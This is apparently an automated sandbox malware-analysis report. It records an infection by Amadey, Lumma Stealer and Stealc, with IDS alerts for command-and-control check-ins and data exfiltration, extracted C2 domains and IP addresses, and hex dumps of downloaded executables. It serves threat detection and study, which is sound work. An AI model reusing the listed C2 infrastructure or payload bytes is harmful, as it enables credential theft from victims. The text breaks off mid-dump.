                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49834 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49861 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49864 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49880 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49885 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49898 version: TLS 1.2
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 9c2827fca4.exe, 0000001C.00000003.2709881052.0000000004770000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 0000001C.00000002.2843648513.0000000000672000.00000040.00000001.01000000.00000012.sdmp, 9c2827fca4.exe, 00000021.00000003.2837715853.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 00000021.00000002.2878103010.0000000000672000.00000040.00000001.01000000.00000012.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_006DDBBE
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E68EE FindFirstFileW,FindClose,11_2_006E68EE
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_006E698F
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_006DD076
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_006DD3A9
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_006E9642
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_006E979D
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_006E9B2B
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E5C97 FindFirstFileW,FindNextFileW,FindClose,11_2_006E5C97
                          Source: chrome.exeMemory has grown: Private usage: 1MB later: 29MB
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 191MB

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
                          Source: Network trafficSuricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:57488 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49781 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49790 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49787 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49800 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49814 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49807 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49827 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49821 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49833 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49834 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49842 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49806 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49852 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49861 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49864 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49870 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49835 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49874 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49897 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49906 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49880 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49806 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49827 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49834 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49790 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49790 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49781 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49781 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49861 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49897 -> 104.21.48.1:443
                          Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                          Source: Malware configuration extractorURLs: dare-curbys.biz
                          Source: Malware configuration extractorURLs: print-vexer.biz
                          Source: Malware configuration extractorURLs: zinc-sneark.biz
                          Source: Malware configuration extractorURLs: se-blurry.biz
                          Source: Malware configuration extractorURLs: atten-supporse.biz
                          Source: Malware configuration extractorURLs: impend-differ.biz
                          Source: Malware configuration extractorURLs: covery-mover.biz
                          Source: Malware configuration extractorURLs: dwell-exclaim.biz
                          Source: Malware configuration extractorURLs: formy-spill.biz
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:09 GMTContent-Type: application/octet-streamContent-Length: 1895424Last-Modified: Mon, 09 Dec 2024 21:09:04 GMTConnection: keep-aliveETag: "67575c70-1cec00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 a6 e5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 79 6a 61 70 71 73 68 00 70 1a 00 00 60 30 00 00 6c 1a 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6a 6e 73 65 6e 6f 65 00 10 00 00 00 d0 4a 00 00 04 00 00 00 c6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ca 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:18 GMTContent-Type: application/octet-streamContent-Length: 1799168Last-Modified: Mon, 09 Dec 2024 21:09:11 GMTConnection: keep-aliveETag: "67575c77-1b7400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 8b d7 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 6e 71 7a 67 6b 67 00 d0 19 00 00 60 4f 00 00 d0 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 71 75 71 6f 76 6c 68 00 10 00 00 00 30 69 00 00 04 00 00 00 4e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 69 00 00 22 00 00 00 52 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:26 GMTContent-Type: application/octet-streamContent-Length: 971776Last-Modified: Mon, 09 Dec 2024 21:07:21 GMTConnection: keep-aliveETag: "67575c09-ed400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 5c 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 24 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 3c ff 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 a8 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 68 01 00 00 40 0d 00 00 6a 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:33 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Mon, 09 Dec 2024 21:07:46 GMTConnection: keep-aliveETag: "67575c22-2c3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 88 b9 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 64 74 76 77 61 6b 66 00 e0 2b 00 00 a0 00 00 00 ce 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6a 6d 69 68 75 61 76 00 20 00 00 00 80 2c 00 00 06 00 00 00 08 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:40 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Mon, 09 Dec 2024 21:07:48 GMTConnection: keep-aliveETag: "67575c24-2c3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 88 b9 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 